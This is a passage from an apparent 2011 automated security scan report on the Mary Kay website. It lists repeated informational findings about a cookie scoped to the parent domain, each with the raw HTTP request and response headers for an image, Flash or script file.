HTTP/1.1 200 OK Content-Length: 960 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:22:36 GMT Accept-Ranges: bytes ETag: "5fe4339c621cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=D17FE5DF44B2B04AF2B926961FD1F468; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:54 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ............................................................................................................#.....[SNIP]...
12.71. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=0F87CA454A59967B490C06993C603D8E; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 920 Content-Type: image/jpeg Last-Modified: Mon, 15 Aug 2011 19:40:43 GMT Accept-Ranges: bytes ETag: "ff998738835bcc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=0F87CA454A59967B490C06993C603D8E; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:54 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ............................................................................................................#.....[SNIP]...
12.72. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_twrandr.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/CONTENT/HPflash/Thumbs/tb_twrandr.jpg
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=CCFC47FF43ECAF98B4F799BC3EFBF379; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /CONTENT/HPflash/Thumbs/tb_twrandr.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 848 Content-Type: image/jpeg Last-Modified: Mon, 01 Aug 2011 21:07:50 GMT Accept-Ranges: bytes ETag: "5da24128f50cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=CCFC47FF43ECAF98B4F799BC3EFBF379; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:54 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ............................................................................................................#.....[SNIP]...
12.73. http://www.marykay.com/Common/SiteCatalyst/marykaycom/s_code.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Common/SiteCatalyst/marykaycom/s_code.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Common/SiteCatalyst/marykaycom/s_code.js HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 41434 Content-Type: application/x-javascript Last-Modified: Thu, 14 Jul 2011 12:43:01 GMT Accept-Ranges: bytes ETag: "8078f2902342cc1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:47 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ /* SiteCatalyst code version: H.23.3. Copyright 1996-2011 Adobe, Inc. All Rights Reserved More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES ***********...[SNIP]...
12.74. http://www.marykay.com/Content/HPflash/245_eyeColorBundle.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Content/HPflash/245_eyeColorBundle.swf
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=C626A75243F4FAE68012C595A3FF22D3; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Content/HPflash/245_eyeColorBundle.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 45207 Content-Type: application/x-shockwave-flash Last-Modified: Thu, 02 Jun 2011 09:19:26 GMT Accept-Ranges: bytes ETag: "9b534f2b621cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=C626A75243F4FAE68012C595A3FF22D3; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:54 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ CWS.....x....XT..?z..F@BJBJRPzP.E:...nI.A....T..AB.$.)I.K ......../.|..............9{.....X...9....j.h.....7.H.....a........9&/.{G71.$.l...,.......y.....O@TT.._.OP....q.vt7..qtca.bB[.a.f.j..n....*..u...[SNIP]...
12.75. http://www.marykay.com/Content/HPflash/254_makeUpArtistLooks.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Content/HPflash/254_makeUpArtistLooks.swf
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=2FCCB00347201A4BA3241398CB9DCDDF; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Content/HPflash/254_makeUpArtistLooks.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=A54BE6714B423AFBADF1DD9C59C8A29F; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 47134 Content-Type: application/x-shockwave-flash Last-Modified: Thu, 02 Jun 2011 09:19:26 GMT Accept-Ranges: bytes ETag: "6318542b621cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=2FCCB00347201A4BA3241398CB9DCDDF; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:46:00 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:46:00 GMT; path=/ CWS.Z...x...u\T..7~.$.)....i..i....SdDAE:..n..TA..EiAD@EDx.........{.?..>w......k...k..... .t..."p....... .J#2...[Z..K.P.:9:{..-.j[OOWAvv...6.n6.w.vN...v..v..VP............Z. .A........... .63w........[SNIP]...
12.76. http://www.marykay.com/Content/HPflash/324m_shopYourWay.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Content/HPflash/324m_shopYourWay.swf
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=C7F280CB4F77F9D1ABACB09CB795199D; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Content/HPflash/324m_shopYourWay.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 33387 Content-Type: application/x-shockwave-flash Last-Modified: Thu, 01 Sep 2011 15:00:31 GMT Accept-Ranges: bytes ETag: "4a6ad5e4b768cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=C7F280CB4F77F9D1ABACB09CB795199D; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:54 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ CWS.....x....<........=2".....BB QQ..[.k6.^...%.B..l.R....-iP.E.^....................|..y....y..uC.] ...@J.......q``@..D.`. .|.....{1...yzy.@..p....-..x......8?......h..[.... .. ..^..`.R...X...y.......[SNIP]...
12.77. http://www.marykay.com/Content/HPflash/330m_%20FallTrend_eng.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Content/HPflash/330m_%20FallTrend_eng.swf
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=42911DD449558CCD78D72F911671B024; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Content/HPflash/330m_%20FallTrend_eng.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 57149 Content-Type: application/x-shockwave-flash Last-Modified: Tue, 30 Aug 2011 17:20:26 GMT Accept-Ranges: bytes ETag: "1d37901b3967cc1:d8265" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=42911DD449558CCD78D72F911671B024; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:55 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:56 GMT; path=/ CWS.,p..x..} <.[...}.N..."IQ.U(....PM..3.E ...J.vm....sK...fiOE...{...3..QM.{..........9....,.9..L0`j..:.(.. ....$wvv.SjH.$......6>*..:.......3.an.`.[... .rC@.....n!............NP...D...m..6..F.<..7....[SNIP]...
12.78. http://www.marykay.com/Content/HPflash/373_TWNightCmpx.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Content/HPflash/373_TWNightCmpx.swf
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=DC6624BB4A5155A703619388F614872E; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Content/HPflash/373_TWNightCmpx.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=921B020F47FD8A57A88269A775E750F4; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 41595 Content-Type: application/x-shockwave-flash Last-Modified: Wed, 20 Jul 2011 19:27:10 GMT Accept-Ranges: bytes ETag: "94cc2051347cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=DC6624BB4A5155A703619388F614872E; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:57 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:58 GMT; path=/ CWS.....x...wXS..7...4A..i...; ....*.$Hob. ...U...A...HQ@....* RU:..w'...y.u.......Fw.g.*3k.....A.P.F.x3......(.....'..3..N2.J*..n..>2`K.....SFP......E.<... KKK. ........>..}m...}...Xq...}..Q..(.wVl.....[SNIP]...
12.79. http://www.marykay.com/Content/HPflash/502_mascaraWardrobe.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Content/HPflash/502_mascaraWardrobe.swf
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=B50F97234F63918E569F658373E875F1; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Content/HPflash/502_mascaraWardrobe.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=19C9D0014D75852EFB8C9087C106B6A5; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 72922 Content-Type: application/x-shockwave-flash Last-Modified: Thu, 02 Jun 2011 09:19:28 GMT Accept-Ranges: bytes ETag: "7387422c621cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=B50F97234F63918E569F658373E875F1; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:55 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:56 GMT; path=/ CWS..F..x..z. ....{q.....D..n..do..{....Rv...eo..G({..QV(..."._...?.....9.y.9.y..y.sn0..\..=..yb@......s... .fi%zCF....... .I0.xx..rqy{{sz.q:.Ys....pq.r..r.....N..>.N.L..0...............n~...C....X.G....[SNIP]...
12.80. http://www.marykay.com/Content/HPflash/502_moc.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Content/HPflash/502_moc.swf
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=7A24463C46D77F60A5600B87E247B550; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Content/HPflash/502_moc.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 57038 Content-Type: application/x-shockwave-flash Last-Modified: Tue, 28 Jun 2011 20:41:18 GMT Accept-Ranges: bytes ETag: "3640a0bbd335cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=7A24463C46D77F60A5600B87E247B550; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:54 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:54 GMT; path=/ CWS..k..x....\SI...Oz.E. M....."E.D..".DJ....AE......WQ.7l.".T. ..b.X...Fi.mIn.jt.......].9g...S.L.7......D....+.......cFj"....(..f..%Q.H{..........C..wT ..a.#@....|.#.#6..;. ......(.....Ct..:.N...3.....[SNIP]...
12.81. http://www.marykay.com/Content/HPflash/BoaB_miniAd.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Content/HPflash/BoaB_miniAd.swf
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=D5A1484C42E60E9E75C52D879D27BB3F; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Content/HPflash/BoaB_miniAd.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 27154 Content-Type: application/x-shockwave-flash Last-Modified: Thu, 01 Sep 2011 11:38:38 GMT Accept-Ranges: bytes ETag: "823f5b19b68cc1:d8265" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=D5A1484C42E60E9E75C52D879D27BB3F; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:54 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ CWS.0...x....\........!-%. .(..R..(..JH,%...J.X. 6v+*"`..6v`..".` ..S..,..z..w....s..s..93'.L>.F..:..R..".*..?Kb__.9.........b.LI.a.l#}.....%2.7.... ..a..L...3../.....}.. ...gD...F|..R..T.3....}....e....[SNIP]...
12.82. http://www.marykay.com/IMAGES/bkgLong.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/IMAGES/bkgLong.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=BA53BB5644EB3C70267713937AE89A33; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /IMAGES/bkgLong.gif HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1942 Content-Type: image/gif Last-Modified: Thu, 02 Jun 2011 09:18:22 GMT Accept-Ranges: bytes ETag: "4fd9e5621cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=BA53BB5644EB3C70267713937AE89A33; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:47 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ GIF89a.......B<:>87JDC60/HBAD><2,+F@>:43@:9<65XRP8214.-4.,;54710?982,*822C=<WQPGA?@::1+*SMLKEC=66OIHXQO3-,932810XQPYRQ5/.D?>LEDF?>E@><55A;:PIG@98VPNWQOUOMSMKMGEOIGTNLRLJQKIPJHNHFICALFDNGFTNMSLKVPOPJIV...[SNIP]...
12.83. http://www.marykay.com/Images/Checkout/viewbag/btn_x.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Images/Checkout/viewbag/btn_x.png
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=A9E1A6E04FDA9397D9FB06A3A1E81552; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Images/Checkout/viewbag/btn_x.png HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 695 Content-Type: image/png Last-Modified: Thu, 02 Jun 2011 09:23:29 GMT Accept-Ranges: bytes ETag: "77524cbc621cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=A9E1A6E04FDA9397D9FB06A3A1E81552; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:48 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ .PNG . ...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...YIDATx...Kk.Q.....<.......2A.J....Tpa.FS....r......"....,.nJ.L........L.....g:. x.r/w...s.....0.[..;....>l..{.$!.T*.l6.\.........[SNIP]...
12.84. http://www.marykay.com/Images/Site/FooterBack1.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Images/Site/FooterBack1.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=E80F63564B8C8303276E31A8100ACBE7; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
